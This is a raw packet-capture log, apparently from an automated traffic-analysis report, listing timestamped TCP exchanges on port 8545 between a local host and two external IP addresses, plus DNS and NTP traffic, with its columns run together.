                                                                                                                        Jan 10, 2025 14:55:44.237864017 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:44.237893105 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:44.337332964 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:44.426984072 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:44.427033901 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:44.592791080 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:44.597609043 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:44.689819098 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:44.694658041 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:44.794305086 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:44.864986897 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:44.865022898 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:44.869839907 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:44.869853973 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:44.968327045 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:45.017740965 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:45.017745972 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:45.081831932 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:45.086755991 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:45.186491966 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:45.423491955 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:45.873157978 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:45.873198986 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:45.878030062 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:45.878043890 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:45.929261923 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:45.934072971 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:45.976979971 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:46.023840904 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:46.033715010 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:46.208920002 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:46.439080954 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:46.443919897 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:46.543423891 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:46.713651896 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:46.821216106 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:46.826212883 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:46.847362995 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:46.847362995 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:46.852287054 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:46.852303028 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:46.925726891 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:46.958861113 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:47.003710032 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:47.008538008 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:47.022181034 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:47.204196930 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:47.209191084 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:47.308695078 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:47.509824038 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:47.645224094 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:47.653011084 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:47.750534058 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:47.816668987 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:47.852754116 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:47.852754116 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:47.858472109 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:47.858489990 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:47.897870064 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:47.903614998 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:47.965544939 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:48.002832890 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:48.021925926 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:48.226914883 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:48.577585936 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:48.582566977 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:48.682159901 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:48.811008930 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:48.912002087 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:48.912048101 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:48.916918993 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:48.916938066 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.018408060 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:49.023276091 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.062143087 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.122550011 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:49.123080969 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.310138941 CET44350111142.250.185.68192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.310338020 CET44350111142.250.185.68192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.310623884 CET50111443192.168.2.7142.250.185.68
                                                                                                                        Jan 10, 2025 14:55:49.320229053 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:49.416481972 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:49.421370029 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.520929098 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.623156071 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:49.736736059 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:49.741604090 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.838392019 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:49.843727112 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.845946074 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:49.845980883 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:49.850723028 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.850733042 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.957535982 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.957566023 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:49.972470045 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:49.977313042 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:50.016534090 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:50.076767921 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:50.214442015 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:50.410110950 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:50.415060997 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:50.514605045 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:50.712219000 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:51.008194923 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:51.008244038 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:51.013154984 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:51.013168097 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:51.113027096 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:51.311338902 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:51.342425108 CET50111443192.168.2.7142.250.185.68
                                                                                                                        Jan 10, 2025 14:55:51.342469931 CET44350111142.250.185.68192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:51.343723059 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:51.354347944 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:51.454113960 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:51.523540020 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:51.834445953 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:51.840223074 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:51.847038984 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:51.847099066 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:51.852804899 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:51.852809906 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:51.939802885 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:51.959203005 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:52.009910107 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:52.014872074 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:52.022993088 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:52.261281013 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:52.266302109 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:52.365789890 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:52.421616077 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:52.847528934 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:52.847528934 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:52.852365017 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:52.852375984 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:52.960166931 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:53.011806965 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:53.228563070 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:53.233357906 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:53.333137035 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:53.412415028 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:53.847480059 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:53.847512960 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:53.852317095 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:53.852328062 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:53.957935095 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:54.014437914 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:54.113764048 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:54.118694067 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:54.218215942 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:54.318861961 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:54.858448029 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:54.858479977 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:54.863300085 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:54.863318920 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:54.962234020 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:55.013854027 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:55.142393112 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:55.147260904 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:55.246782064 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:55.318681955 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:55.436419010 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:55.441334963 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:55.847496033 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:55.849939108 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:55.852936983 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:55.855305910 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:55.960397959 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:56.119776011 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:56.847251892 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:56.849730968 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:56.852092981 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:56.854511023 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:56.956875086 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:57.130059958 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:57.845976114 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:57.850032091 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:57.850903988 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:57.854799986 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:57.957463026 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:57.959631920 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:57.964462996 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:58.846916914 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:58.846978903 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:58.851984978 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:58.852026939 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:58.960208893 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:59.019124031 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:59.824055910 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:59.828989029 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:59.845969915 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:59.846010923 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:55:59.850821972 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:59.850840092 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:59.929188967 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:59.933737993 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:55:59.938591957 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:59.961042881 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.009753942 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:56:00.038939953 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.052500963 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:56:00.057286024 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.157007933 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.160311937 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:56:00.165214062 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.264873028 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.266717911 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:56:00.271538973 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.361424923 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.496426105 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.496489048 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:56:00.497642040 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:56:00.502410889 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.848700047 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:56:00.848819017 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:56:00.853498936 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.853534937 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:00.967924118 CET8545497833.33.155.121192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:01.019337893 CET498088545192.168.2.715.197.152.159
                                                                                                                        Jan 10, 2025 14:56:01.021953106 CET497838545192.168.2.73.33.155.121
                                                                                                                        Jan 10, 2025 14:56:01.024231911 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:01.123945951 CET85454980815.197.152.159192.168.2.7
                                                                                                                        Jan 10, 2025 14:56:01.220206022 CET498088545192.168.2.715.197.152.159
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 10, 2025 14:54:34.281924963 CET53545221.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:34.290792942 CET53650931.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:35.559634924 CET53632331.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:36.312757969 CET123123192.168.2.7104.40.149.189
                                                                                                                        Jan 10, 2025 14:54:36.497847080 CET123123104.40.149.189192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:38.671454906 CET5155553192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:38.671581984 CET5048253192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:38.678298950 CET53515551.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:38.678499937 CET53504821.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:40.177309036 CET5768553192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:40.177309990 CET4996453192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:40.628494024 CET53576851.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:40.685378075 CET53499641.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:41.283432961 CET5837153192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:41.283515930 CET6466653192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:41.533082008 CET53583711.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:41.847618103 CET53646661.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:42.698815107 CET6058353192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:42.699184895 CET5951753192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:42.733278990 CET53605831.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:43.239856958 CET53595171.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.138366938 CET6175153192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:44.138366938 CET5852353192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:44.138951063 CET5712953192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:44.139439106 CET5689653192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:44.144943953 CET53585231.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.145589113 CET53617511.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.145601034 CET53571291.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.146228075 CET53568961.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.197266102 CET53559971.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.818387985 CET6344853192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:44.818511963 CET5633753192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:44.825844049 CET53563371.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.962323904 CET5124453192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:44.962475061 CET5637953192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:44.969237089 CET53512441.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.969332933 CET53563791.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:46.114712954 CET4969153192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:46.115067005 CET5734853192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:46.262039900 CET5746353192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:46.262331009 CET5679653192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:46.279731989 CET53567961.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:46.290632010 CET53574631.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:46.358872890 CET53573481.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:46.639750004 CET53496911.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:47.272264004 CET5496253192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:47.272783041 CET5046253192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:47.300184965 CET53549621.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:47.302465916 CET53504621.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:47.321537971 CET6499353192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:47.321693897 CET5946153192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:47.327750921 CET5060953192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:47.328027010 CET5760353192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:47.334431887 CET53506091.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:47.334973097 CET53576031.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:47.483722925 CET5402453192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:47.484168053 CET5839353192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:47.490353107 CET53540241.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:47.490787983 CET53583931.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:48.398540974 CET5045453192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:48.398684978 CET5014453192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:48.405211926 CET53504541.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:48.405424118 CET53501441.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:49.176557064 CET5165353192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:49.176855087 CET5830253192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:49.183370113 CET53516531.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:49.183588028 CET53583021.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:49.714452028 CET6399153192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:49.714567900 CET5389353192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:49.721355915 CET53639911.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:49.721374989 CET53538931.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:49.738483906 CET5141653192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:49.738955021 CET5246053192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:49.745321989 CET53514161.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:49.745898962 CET53524601.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:50.231592894 CET6290853192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:50.231849909 CET6003053192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:50.238730907 CET53629081.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:50.238904953 CET53600301.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:50.246992111 CET53552511.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:51.223997116 CET6176653192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:51.224168062 CET5545253192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:51.230668068 CET53617661.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:51.230884075 CET53554521.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:51.675617933 CET5439053192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:51.675870895 CET5230853192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:51.682384014 CET53523081.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:51.701606989 CET53543901.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:51.726094007 CET5156253192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:51.726310015 CET5955553192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:51.733069897 CET53515621.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:51.733103037 CET53595551.1.1.1192.168.2.7
